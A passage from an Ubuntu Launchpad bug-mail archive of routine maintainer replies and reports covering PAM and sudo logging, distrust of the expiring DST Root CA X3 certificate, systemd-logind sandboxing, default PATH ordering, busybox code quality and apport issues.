  for the users. The upstream author was engaged but it never reached
  resolution.  https://bugs.launchpad.net/ubuntu/+source/ccid/+bug/1175465

  Has a debian/watch file.
  Quilt packaging.

  P: ccid source: no-dep5-copyright
  P: ccid source: package-uses-experimental-debhelper-compat-version 13

  [Dependencies]
  Minimal dependencies, in main

  [Standards compliance]
  Appears to satisfy FHS and Debian policy

  [Maintenance]
  The desktop team will subscribe to bugs, however it is expected that the
  security team will assist with security-relevant questions.

  [Background information]
  ccid provides drivers to interact with usb-connected smart card readers.

  ==> libpam-pkcs11 <==
  [Availability]
  Source package pam-pkcs11 is in universe and builds on all architectures.

  [Rationale]
  The desktop team and security team are interested in bringing smartcard
  authentication to enterprise desktop environments.

  [Security]
  No CVEs in our database.
  Doesn't appear to bind to sockets.
  No privileged executables (but is a PAM module).
  As a PAM module this will require a security review.

  [Quality assurance]
  The package does not call pam-auth-update in its postinst #1650366
  Does not ask questions during install.
  One Ubuntu bug claims very poor behaviour if a card isn't plugged in.
  No Debian bugs.
  Occasional updates in Debian by long-term maintainer.
  Does require odd hardware that we'll probably need to buy.
  Does not appear to run tests during build.
  Has scary warnings in the build logs.
  Has a debian/watch file.

  Ancient standards version; other smaller lintian messages, mostly
  documentation problems.

  Quilt packaging.

  [Dependencies]
  Depends on libcurl4, libldap-2.4-2, libpam0g, libpcsclite1, libssl1.1
  All are in main.

  [Standards compliance]
  The package does not call pam-auth-update in its postinst #1650366
  Otherwise looks to conform to FHS and Debian policies

  [Maintenance]
  The desktop team will subscribe to bugs, however it is expected that the
  security team will assist with security-relevant questions.

  [Background information]
  This PAM module can use CRLs and full-chain verification of certificates.
  It can also do LDAP, AD, and Kerberos username mapping.

  ==> libpcsc-perl <==
  [Availability]
  Source package pcsc-perl is in universe, builds for all architectures,
  plus i386

  [Rationale]
  The desktop team and security team are interested in bringing smartcard
  authentication to enterprise desktop environments.

  [Security]
  There are no cves for pcsc-perl in our database.
  No privileged executables.
  Doesn't appear to bind to sockets.
  Probably needs a security review.

  [Quality assurance]
  Library package not intended to be used directly.
  No debconf questions.
  No bugs in Debian.
  No bugs in Ubuntu.
  Does require odd hardware that we'll probably need to buy.
  Tests exist, not run during the build; probably can't run during the build.
  Includes debian/watch file.
  A handful of lintian issues
  Quilt packaging.

  [Dependencies]
  libpcsc-perl depends upon libpcsclite1, libc6, perl, perlapi-5.30.0.
  All are in main.

  [Standards compliance]
  One oddity, Card.pod is 

[Touch-packages] [Bug 1860826] Re: pam_unix(sudo:auth): Couldn't open /etc/securetty: No such file or directory

2021-09-28 Thread Seth Arnold
Worked for me on my daily workstation:

⏚ [sarnold:~/trees] 100 $ sudo apt install -tfocal-proposed libpam0g 
libpam-runtime libpam-modules-bin libpam-modules
Reading package lists... Done
Building dependency tree   
Reading state information... Done
Recommended packages:
  update-motd
The following packages will be upgraded:
  libpam-modules libpam-modules-bin libpam-runtime libpam0g
4 upgraded, 0 newly installed, 0 to remove and 50 not upgraded.
Need to get 394 kB of archives.
After this operation, 0 B of additional disk space will be used.
Get:1 http://192.168.0.27/ubuntu focal-proposed/main amd64 libpam0g amd64 
1.3.1-5ubuntu4.3 [55.4 kB]
Get:2 http://192.168.0.27/ubuntu focal-proposed/main amd64 libpam-modules-bin 
amd64 1.3.1-5ubuntu4.3 [41.2 kB]
Get:3 http://192.168.0.27/ubuntu focal-proposed/main amd64 libpam-modules amd64 
1.3.1-5ubuntu4.3 [260 kB]
Get:4 http://192.168.0.27/ubuntu focal-proposed/main amd64 libpam-runtime all 
1.3.1-5ubuntu4.3 [37.3 kB]
Fetched 394 kB in 0s (10.6 MB/s)  
Preconfiguring packages ...
(Reading database ... 233861 files and directories currently installed.)
Preparing to unpack .../libpam0g_1.3.1-5ubuntu4.3_amd64.deb ...
Unpacking libpam0g:amd64 (1.3.1-5ubuntu4.3) over (1.3.1-5ubuntu4.2) ...
Setting up libpam0g:amd64 (1.3.1-5ubuntu4.3) ...
(Reading database ... 233861 files and directories currently installed.)
Preparing to unpack .../libpam-modules-bin_1.3.1-5ubuntu4.3_amd64.deb ...
Unpacking libpam-modules-bin (1.3.1-5ubuntu4.3) over (1.3.1-5ubuntu4.2) ...
Setting up libpam-modules-bin (1.3.1-5ubuntu4.3) ...
(Reading database ... 233861 files and directories currently installed.)
Preparing to unpack .../libpam-modules_1.3.1-5ubuntu4.3_amd64.deb ...
Unpacking libpam-modules:amd64 (1.3.1-5ubuntu4.3) over (1.3.1-5ubuntu4.2) ...
Setting up libpam-modules:amd64 (1.3.1-5ubuntu4.3) ...
(Reading database ... 233861 files and directories currently installed.)
Preparing to unpack .../libpam-runtime_1.3.1-5ubuntu4.3_all.deb ...
Unpacking libpam-runtime (1.3.1-5ubuntu4.3) over (1.3.1-5ubuntu4.2) ...
Setting up libpam-runtime (1.3.1-5ubuntu4.3) ...
Processing triggers for man-db (2.9.1-1) ...
Processing triggers for libc-bin (2.31-0ubuntu9.2) ...
⏚ [sarnold:~/trees] 7s $ sudo -k ; sudo ls 
[sudo] password for sarnold: 
...

recent journal entries:
Sep 28 20:24:43 millbarge sudo[540916]: pam_unix(sudo:auth): Couldn't open 
/etc/securetty: No such file or directory
Sep 28 20:24:45 millbarge sudo[540916]: pam_unix(sudo:auth): Couldn't open 
/etc/securetty: No such file or directory

and journal entries from an authentication performed after installing
the update:

Sep 28 20:27:14 millbarge audit[548532]: SYSCALL arch=c03e syscall=59 
success=yes exit=0 a0=55bfed873130 a1=55bfed6fa4f0 a2=55bfed8b1910 a3=8 items=2 
ppid=19448 pid=548532 auid=1000 uid=1000 gid=1000 euid=0 suid=0 fsuid=0 
egid=1000 sgid=1000 fsgid=1000 tty=pts2 ses=4 comm="sudo" exe="/usr/bin/sudo" 
key="execpriv"
Sep 28 20:27:14 millbarge audit: EXECVE argc=2 a0="sudo" a1="-k"
Sep 28 20:27:14 millbarge audit: CWD cwd="/home/sarnold/trees"
Sep 28 20:27:14 millbarge audit: PATH item=0 name="/usr/bin/sudo" inode=814680 
dev=00:1c mode=0104755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 
cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0
Sep 28 20:27:14 millbarge audit: PATH item=1 name="/lib64/ld-linux-x86-64.so.2" 
inode=452898 dev=00:1c mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL 
cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0
Sep 28 20:27:14 millbarge audit: PROCTITLE proctitle=7375646F002D6B
Sep 28 20:27:14 millbarge audit[548533]: SYSCALL arch=c03e syscall=59 
success=yes exit=0 a0=55bfed6ddf40 a1=55bfed727b00 a2=55bfed8b1910 a3=8 items=2 
ppid=19448 pid=548533 auid=1000 uid=1000 gid=1000 euid=0 suid=0 fsuid=0 
egid=1000 sgid=1000 fsgid=1000 tty=pts2 ses=4 comm="sudo" exe="/usr/bin/sudo" 
key="execpriv"
Sep 28 20:27:14 millbarge audit: EXECVE argc=2 a0="sudo" a1="ls"
Sep 28 20:27:14 millbarge audit: CWD cwd="/home/sarnold/trees"
Sep 28 20:27:14 millbarge audit: PATH item=0 name="/usr/bin/sudo" inode=814680 
dev=00:1c mode=0104755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 
cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0
Sep 28 20:27:14 millbarge audit: PATH item=1 name="/lib64/ld-linux-x86-64.so.2" 
inode=452898 dev=00:1c mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL 
cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0
Sep 28 20:27:14 millbarge audit: PROCTITLE proctitle=7375646F006C73
Sep 28 20:27:17 millbarge audit[548533]: USER_AUTH pid=548533 uid=1000 
auid=1000 ses=4 msg='op=PAM:authentication grantors=pam_permit,pam_cap 
acct="sarnold" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/2 
res=success'
Sep 28 20:27:17 millbarge audit[548533]: USER_ACCT pid=548533 uid=1000 
auid=1000 ses=4 msg='op=PAM:accounting grantors=pam_permit acct="sarnold" 
exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/2 res=success'
Sep 28 20:27:17 millbarge sudo[548533]:  sarnold 

[Touch-packages] [Bug 1944481] Re: Distrust "DST Root CA X3"

2021-09-24 Thread Seth Arnold
You can find older packages on the "full publishing history" from
launchpad:

https://launchpad.net/ubuntu/+source/ca-certificates/+publishinghistory

You can either download it manually or use the pull-lp-debs(1) command
from the ubuntu-dev-tools package.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to ca-certificates in Ubuntu.
https://bugs.launchpad.net/bugs/1944481

Title:
  Distrust "DST Root CA X3"

Status in ca-certificates package in Ubuntu:
  Fix Committed
Status in ca-certificates source package in Trusty:
  Fix Released
Status in ca-certificates source package in Xenial:
  Fix Released
Status in ca-certificates source package in Bionic:
  Fix Released
Status in ca-certificates source package in Focal:
  Fix Released
Status in ca-certificates source package in Hirsute:
  Fix Released
Status in ca-certificates source package in Impish:
  Fix Committed

Bug description:
  [Impact]

   * ca-certificates trusts the letsencrypt CA certificate "ISRG Root X1"
   * ca-certificates also trusts the CA certificate "DST Root CA X3" which 
cross-signs letencrypt CA
   * "DST Root CA X3" is about to expire, however it has issued an updated 
cross-signature to letsencrypt beyond its own expiry
   * This causes issues with older implementations of openssl & gnutls that 
reject such chains when offered to clients by servers.
   * We have provided fixes for openssl in xenial and gnutls in bionic/xenial, 
however trusty systems remain affected. Also any self built old copies of 
openssl/gnutls remain suspeptible to this expiry.
   * One solution is to blacklist the "DST Root CA X3" from the ca-certificates 
package as described at 
https://blog.devgenius.io/rhel-centos-7-fix-for-lets-encrypt-change-8af2de587fe4
 - connectivity to sites chained to "DST Root CA X3" will be unaffected, and 
servers that chain to both "ISRG Root X1" and "DST Root CA X3" should start to 
work unmodified.
   * This is similar to how this was handled for AddTrust before

  "* mozilla/blacklist.txt: blacklist expired AddTrust External Root
  CA."

  [Test Plan]

   * Install old/current ca-certificates faketime wget curl
  libcurl3-gnutls

  # faketime 2021-10-01 wget https://pskov.surgut.co.uk
  --2021-10-01 00:00:00--  https://pskov.surgut.co.uk/
  Resolving pskov.surgut.co.uk (pskov.surgut.co.uk)... 2a01:4f8:c17:3dd8::1, 
49.12.37.5
  Connecting to pskov.surgut.co.uk 
(pskov.surgut.co.uk)|2a01:4f8:c17:3dd8::1|:443... connected.
  ERROR: cannot verify pskov.surgut.co.uk's certificate, issued by 
'/C=US/O=Let\'s Encrypt/CN=R3':
    Issued certificate has expired.
  To connect to pskov.surgut.co.uk insecurely, use `--no-check-certificate'.

  # LD_PRELOAD=/usr/lib/x86_64-linux-gnu/libcurl-gnutls.so.4 faketime 
2021-10-01 curl https://pskov.surgut.co.uk >/dev/null
    % Total% Received % Xferd  Average Speed   TimeTime Time  
Current
   Dload  Upload   Total   SpentLeft  Speed
    0 00 00 0  0  0 --:--:-- --:--:-- --:--:-- 0
  curl: (60) SSL certificate problem: certificate has expired

   * Install new ca-certificates package

  # faketime 2021-10-01 wget https://pskov.surgut.co.uk
  --2021-10-01 00:00:00--  https://pskov.surgut.co.uk/
  Resolving pskov.surgut.co.uk (pskov.surgut.co.uk)... 2a01:4f8:c17:3dd8::1, 
49.12.37.5
  Connecting to pskov.surgut.co.uk 
(pskov.surgut.co.uk)|2a01:4f8:c17:3dd8::1|:443... connected.
  HTTP request sent, awaiting response... 200 OK
  Length: 612 [text/html]
  Saving to: 'index.html.3'

  100%[>] 612
  --.-K/s   in 0s

  2021-10-01 00:00:00 (71.7 MB/s) - 'index.html.3' saved [612/612]

   LD_PRELOAD=/usr/lib/x86_64-linux-gnu/libcurl-gnutls.so.4 faketime 2021-10-01 
curl https://pskov.surgut.co.uk >/dev/null
    % Total% Received % Xferd  Average Speed   TimeTime Time  
Current
   Dload  Upload   Total   SpentLeft  Speed
  100   612  100   6120 0   5794  0 --:--:-- --:--:-- --:--:--  5828

  Download is successful.

  [Where problems could occur]

   * Connectivity to "DST Root CA X3" websites only, even under faketime
  set to dates prior to 30th of September 2021 will not work, as "DST
  Root CA X3" certificate is no longer installed. users should locally
  install and enable that CA certificate, or allow dangerous unverified
  connectivity to websites using expired CA certs.

  [Other Info]

   * Related openssl and gnutls28 bugs are
  https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/1928989 and
  https://bugs.launchpad.net/ubuntu/+source/gnutls28/+bug/1928648

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/ca-certificates/+bug/1944481/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : 

Re: [Touch-packages] [Bug 1934393] Re: systemd-logind network access is blocked, and breaks remote authentication configurations

2021-09-22 Thread Seth Arnold
I initially preferred your option two, a drop-in file in whichever nis
and ldap binary packages, on principle of trying to keep the mitigations
in place if we can.

But your case for a difficult debugging session is persuasive. Reading
the various bug reports around this, option three seems pretty bad --
none of those symptoms would make me think of changing a systemd hardening
configuration on a service I might not know I am running. Nothing really
looked obviously related to network-based id services. Trying to provide
documentation around that won't be very discoverable.

Ubuntu is supposed to be easy.

So, option one: removing the restrictions for systemd-logind in our
package.

It would be nice if our implementation of option one would make it very
easy to re-add the hardening setting; which we could then document in a
hardening guide.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openldap in Ubuntu.
https://bugs.launchpad.net/bugs/1934393

Title:
  systemd-logind network access is blocked, and breaks remote
  authentication configurations

Status in systemd:
  Fix Released
Status in nis package in Ubuntu:
  Confirmed
Status in openldap package in Ubuntu:
  Confirmed
Status in systemd package in Ubuntu:
  Confirmed
Status in nis package in Debian:
  Fix Released

Bug description:
  [impact]

  starting in focal, systemd-logind runs sandboxed without any network
  access, which breaks any configuration that uses remote servers for
  user data, e.g. ldap, nis, etc

  A more full discussion is available in the upstream bug report as well
  as the debian bug report, see other info section below

  [test case]

  many possible ways to reproduce this; there are reproducers in some of
  the bugs reported before that are caused by this, e.g. bug 1915502 or
  bug 1916235

  [regression potential]

  failure to authenticate when using remote user data, incorrect
  authentication, security issues due to un-sandboxing of systemd-logind

  [scope]

  this is needed in f and later

  before focal, systemd-logind was not sandboxed so this did not apply

  [other info]

  this isn't actually a bug in systemd, this is a by-design security feature; 
see links below (and/or comment 13 in this bug) to upstream comments about how 
systemd's position is that no NSS module should ever perform network access, 
and any NSS module that does needs to also adjust the restrictions of systemd 
services such as systemd-logind, systemd-userdbd, and possibly others that 
might need to make NSS calls into glibc.
  https://github.com/systemd/systemd/issues/7074#issuecomment-338157851
  https://github.com/systemd/systemd/issues/15705#issuecomment-624125354

  this may also can cause systemd-udevd failures in some cases as well.
  https://github.com/systemd/systemd/pull/7343#issuecomment-344800313

  For reference, upstream discussion around the systemd-logind sandboxing 
specifically:
  https://github.com/systemd/systemd/issues/7074
  upstream updated doc PR explaining the upstream position:
  https://github.com/systemd/systemd/pull/7343

  Debian bug report:
  https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=878625
  Note that while this Debian bug is marked as fix released, I don't think it 
actually fixes the problem, from the final comment it seems like the only 
change was to add Recommends: nscd, which doesn't really solve things if 
someone doesn't use nscd.

To manage notifications about this bug go to:
https://bugs.launchpad.net/systemd/+bug/1934393/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1944006] Re: focal cloud image on kvm does not have ip_tables kernel module

2021-09-17 Thread Seth Arnold
Hello, can you please look for ip_tables.ko in
/lib/modules/*/kernel/net/ipv4/netfilter/ip_tables.ko ? Which linux-
modules-* package and which linux-image-* packages do you have
installed?

Thanks

** Package changed: iptables (Ubuntu) => linux (Ubuntu)

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to iptables in Ubuntu.
https://bugs.launchpad.net/bugs/1944006

Title:
  focal cloud image on kvm does not have ip_tables kernel module

Status in linux package in Ubuntu:
  New

Bug description:
  
  $ sudo iptables -L
  modprobe: FATAL: Module ip_tables not found in directory 
/lib/modules/5.4.0-84-generic
  iptables v1.6.1: can't initialize iptables table `filter': Table does not 
exist (do you need to insmod?)
  Perhaps iptables or your kernel needs to be upgraded.

  
  No ip_tables.ko
  ```
  $ ls -l /lib/modules/`uname -r`/kernel/net/ipv4
  total 24
  -rw-r--r-- 1 root root 11257 Aug 26 18:48 gre.ko
  -rw-r--r-- 1 root root 12161 Aug 26 18:48 udp_tunnel.ko
  ```

  Cloud images downloaded from - 
http://cloud-images.ubuntu.com/releases/focal/release/
  ```
  $ ls -l
  total 569308
  -rw-rw-r-- 1 rtip rtip 543817728 Sep  7 17:35 
ubuntu-20.04-server-cloudimg-amd64-disk-kvm.img
  -rw-rw-r-- 1 libvirt-qemu kvm   27373249 Sep  7 17:37 
ubuntu-20.04-server-cloudimg-amd64-initrd-generic
  -rw-rw-r-- 1 libvirt-qemu kvm   11776256 Sep  7 17:37 
ubuntu-20.04-server-cloudimg-amd64-vmlinuz-generic
  ```

  ProblemType: Bug
  DistroRelease: Ubuntu 18.04
  Package: iptables 1.6.1-2ubuntu2
  ProcVersionSignature: Ubuntu 5.4.0-84.94-generic 5.4.133
  Uname: Linux 5.4.0-84-generic x86_64
  ApportVersion: 2.20.9-0ubuntu7.26
  Architecture: amd64
  Date: Fri Sep 17 20:57:42 2021
  ProcEnviron:
   LANG=C.UTF-8
   SHELL=/bin/bash
   TERM=vt220
   XDG_RUNTIME_DIR=
   PATH=(custom, no user)
  SourcePackage: iptables
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1944006/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


Re: [Touch-packages] [Bug 1792004] Re: built-in PATH seems to have sbin and bin out of order; and inconsistent

2021-08-30 Thread Seth Arnold
On Tue, Aug 31, 2021 at 12:45:38AM -, Ubfan wrote:
> Since 20.04, there are no /bin and /sbin directories, they are just
> links to /usr/sbin and /usr/bin -- perhaps they should be eliminated
> from the default PATH.

Does it matter if you upgraded from 18.04 or 19.10 vs a fresh install?

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to systemd in Ubuntu.
https://bugs.launchpad.net/bugs/1792004

Title:
  built-in PATH seems to have sbin and bin out of order; and
  inconsistent

Status in apt package in Ubuntu:
  Fix Released
Status in bash package in Ubuntu:
  Fix Released
Status in busybox package in Ubuntu:
  New
Status in dash package in Ubuntu:
  New
Status in dpkg package in Ubuntu:
  Won't Fix
Status in pam package in Ubuntu:
  New
Status in systemd package in Ubuntu:
  Invalid
Status in bash source package in Xenial:
  Fix Released
Status in bash source package in Bionic:
  Fix Released
Status in bash source package in Cosmic:
  Fix Released
Status in bash source package in Disco:
  Fix Released

Bug description:
  [Impact]

   * For consistency reasons sbin should be ordered before bin in PATH.

  [Test Case]

   * $ env -u PATH /bin/bash -c 'echo $PATH'

  And check that matching pairs in PATH, have /sbin variant leading /bin
  variant.

  [Regression Potential]

   * Ubuntu does not ship duplicate binries, with different behaviour
  between /sbin and /bin, thus all binaries will continue to be found in
  all locations. Also PATH is normally already set in the environment,
  and this change only affects the fallback path when bash is executed
  without any environment, i.e. booting with 'init=/bin/bash'

  [Other Info]
   
   * Original bug report detailing inconsistent paths between various shells.

  ---

  
  $ env -u PATH /bin/sh -c 'echo $PATH'
  /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

  $ env -u PATH /bin/dash -c 'echo $PATH'
  /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

  $ systemd-run --unit test-env env # ... and check journal for PATH
  /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

  $ env -u PATH /bin/bash -c 'echo $PATH'
  /usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin:/bin:/sbin:.

  $ env -u PATH /bin/busybox sh -c 'echo $PATH'
  /sbin:/usr/sbin:/bin:/usr/bin

  $ grep 'export PATH=' -r initramfs-tools-0.131ubuntu10/
  initramfs-tools-0.131ubuntu10/mkinitramfs:export PATH='/usr/bin:/sbin:/bin'
  initramfs-tools-0.131ubuntu10/init:export PATH=/sbin:/usr/sbin:/bin:/usr/bin

  dracut.sh has DRACUT_PATH=${DRACUT_PATH:-/sbin /bin /usr/sbin /usr/bin} 
exported as PATH
  dracut-047+31/modules.d/99shutdown/shutdown.sh:export 
PATH=/usr/sbin:/usr/bin:/sbin:/bin

  $ cat /etc/environment
  
PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games"

  apt & dpkg => should probably initiate /usr/local-less PATH

  Imho the rest should probably be harmonised to:

  /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

  ===

  From a duplicate
  https://bugs.launchpad.net/ubuntu/+source/bash/+bug/1614080 :

  $ for i in 12.04 12.10 13.04 13.10 14.04 14.10 15.04 15.10 16.04; do echo $i; 
docker run -it --rm ubuntu:$i bash -c "unset PATH; /bin/bash -c 'echo \$PATH'"; 
done
  12.04
  /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
  12.10
  /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
  13.04
  /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
  13.10
  /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
  14.04
  /usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin:/bin:/sbin:.
  14.10
  /usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin:/bin:/sbin:.
  15.04
  /usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin:/bin:/sbin:.
  15.10
  /usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin:/bin:/sbin:.
  16.04
  /usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin:/bin:/sbin:.

  I believe later releases of bash, do too include CWD in the built-in
  PATH.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apt/+bug/1792004/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1933979] Re: [MIR] busybox package

2021-08-10 Thread Seth Arnold
Just how bad are the consequences of not promoting this package to main?

The code is fairly gross. There's absolute gobs of writing outside array
bounds, resource leaks, potential uses of uninitialized variables, etc.

I don't know if there's any security-relevant findings -- busybox is
almost always restricted solely to a system administrator who is in
trouble and needs tools and can't have the Good Tools for whatever
reason, so a lot of the choices sort of make sense. However, there's
just a lot of choices that may have made sense thirty years ago that
just don't make sense today, and a lot of the choices make it much
harder to use Coverity or similar tools to find the real bugs.

Actually bringing the entire codebase up to modern standards is not
going to be cost-effective (and probably not within the goals of the
project).

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to busybox in Ubuntu.
https://bugs.launchpad.net/bugs/1933979

Title:
   [MIR] busybox package

Status in busybox package in Ubuntu:
  New

Bug description:
  [Availability]
  ==
  src:busybox was introduced in Dapper (2006) and has been in main since then. 
src:busybox & bin:busybox-static are in main, to be more precise. And this 
request is to promote bin:busybox from src:busybox in main, too. It only 
depends on the libc6 package, which is in main already. The package builds on 
all the architectures; is Arch:any.

  [Rationale]
  ===
  This package is to be included in our partner's cloud images, going back to 
Bionic. As cloud images are to ship only packages from main this request is to 
see that happen.

  [Security]
  ==
  The binary doesn't install services / daemons (/etc/init.d/*, /etc/init/*, 
/lib/systemd/system/*). Just ships the "busybox" binary, its docs, and a man 
page.

  [Dependencies]
  ==
  libc6, which is in main already.

  [Maintenance]
  =
  Server team.

  [Background information]
  
  Tiny utilities for small and embedded systems.

  ---
  Upstream: https://git.busybox.net/busybox/
  Launchpad page: https://launchpad.net/ubuntu/+source/busybox
  Ubuntu bugs: https://bugs.launchpad.net/ubuntu/+source/busybox
  Debian Package Tracker: https://tracker.debian.org/pkg/busybox
  Debian bugs: 
https://bugs.debian.org/cgi-bin/pkgreport.cgi?repeatmerged=no=busybox

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/busybox/+bug/1933979/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1935076] Re: ubuntu-bug sends huge amounts of internal data to public bugs without asking for permission

2021-08-10 Thread Seth Arnold
dmesg in bug reports is fantastically helpful: it is a very fast and
reliable way to diagnose many classes of hardware problems or filesystem
flaws or kernel module incompatibilities that show up to the user as
bugs in their programs. Having it available has saved both developers
and users a *lot* of time.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apport in Ubuntu.
https://bugs.launchpad.net/bugs/1935076

Title:
  ubuntu-bug sends huge amounts of internal data to public bugs without
  asking for permission

Status in apport package in Ubuntu:
  Confirmed

Bug description:
  I just created a bug with "ubuntu-bug -w" as recommeneded by the bug
  reporting guidelines.

  After creating it, I saw that without my confirmations many files with
  detailed output about my machine, ip and process environments and
  connected hardware etc have been collected, uploaded to launchpad and
  made publicly visible without my permission, and without any
  possibility to remove it again and select myself what I want to
  disclose.

  This is a serious security and privacy issue opinion.

  Please tell me ASAP how I can delete m,y data that I do not want to be
  publicly available.

  ProblemType: Bug
  DistroRelease: Ubuntu 20.10
  Package: apport-gtk 2.20.11-0ubuntu50.7
  ProcVersionSignature: Ubuntu 5.8.0-59.66-lowlatency 5.8.18
  Uname: Linux 5.8.0-59-lowlatency x86_64
  ApportVersion: 2.20.11-0ubuntu50.7
  Architecture: amd64
  CasperMD5CheckResult: skip
  CrashReports:
   644:1000:124:0:2021-07-08 04:45:57.713189974 +0200:2021-07-08 
04:45:57.713189974 +0200:/var/crash/_usr_bin_jackd.1000.upload
   640:1000:124:173589:2021-07-08 04:45:57.713189974 +0200:2021-07-08 
04:45:57.713189974 +0200:/var/crash/_usr_bin_jackd.1000.crash
   600:118:124:37:2021-07-08 04:46:00.914606508 +0200:2021-07-08 
04:46:00.906605467 +0200:/var/crash/_usr_bin_jackd.1000.uploaded
  CurrentDesktop: ubuntu:GNOME
  Date: Thu Jul  8 21:01:23 2021
  ExecutablePath: /usr/share/apport/apport-gtk
  InstallationDate: Installed on 2020-04-12 (451 days ago)
  InstallationMedia: Ubuntu 19.10 "Eoan Ermine" - Release amd64 (20191017)
  InterpreterPath: /usr/bin/python3.8
  PackageArchitecture: all
  Python3Details: /usr/bin/python3.8, Python 3.8.10, python3-minimal, 
3.8.6-0ubuntu1
  PythonDetails: /usr/bin/python2.7, Python 2.7.18, python-is-python2, 2.7.17-4
  SourcePackage: apport
  UpgradeStatus: Upgraded to groovy on 2020-11-03 (247 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1935076/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1427600] Re: apport-unpack: ValueError: ['UserGroups'] has no binary content

2021-07-27 Thread Seth Arnold
** Information type changed from Private Security to Public

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apport in Ubuntu.
https://bugs.launchpad.net/bugs/1427600

Title:
  apport-unpack: ValueError: ['UserGroups'] has no binary content

Status in apport package in Ubuntu:
  Fix Released
Status in apport source package in Xenial:
  Triaged
Status in apport source package in Focal:
  Fix Released
Status in apport source package in Groovy:
  Fix Released

Bug description:
  [Impact]
  apport-unpack crashes when trying to unpack a crash

  [Test Case]
  On a system running 20.04 LTS:
  1) create an additional user who is only a member of their own group e.g.
  bdmurray@clean-focal-amd64:~$ id crashy
  uid=1001(crashy) gid=1001(crashy) groups=1001(crashy)
  2) Launch a process as that user
  3) kill -11 that process
  4) Confirm there is a crash file in /var/crash for that process
  5) Run apport-unpack on that .crash file

  With the version of apport from -proposed you will not get another
  crash file when unpacking the crash file.

  [Regression Potential]
  We are just setting UserGroups to 'N/A' as opposed to having it be completely 
empty so there isn't any chance for regression.

  When running apport-unpack to get at a core dump

  laney@raleigh> sudo apport-unpack 
_usr_lib_x86_64-linux-gnu_urfkill_urfkilld.0.crash ~/temp/zozoz
  [sudo] password for laney:
  Traceback (most recent call last):
    File "/usr/bin/apport-unpack", line 73, in 
  pr.extract_keys(f, bin_keys, dir)
    File "/usr/lib/python3/dist-packages/problem_report.py", line 253, in 
extract_keys
  [item for item, element in b64_block.items() if element is False])
  ValueError: ['UserGroups'] has no binary content
  laney@raleigh> apport-cli --version
  2.16.2

  It's not terrible, because most files are unpacked (those which sort
  before UserGroups, I guess).

  ProblemType: BugDistroRelease: Ubuntu 15.04
  Package: apport 2.16.2-0ubuntu1
  ProcVersionSignature: Ubuntu 3.19.0-7.7-generic 3.19.0
  Uname: Linux 3.19.0-7-generic x86_64
  ApportLog:

  ApportVersion: 2.16.2-0ubuntu1
  Architecture: amd64
  CurrentDesktop: Unity
  Date: Tue Mar  3 10:09:26 2015
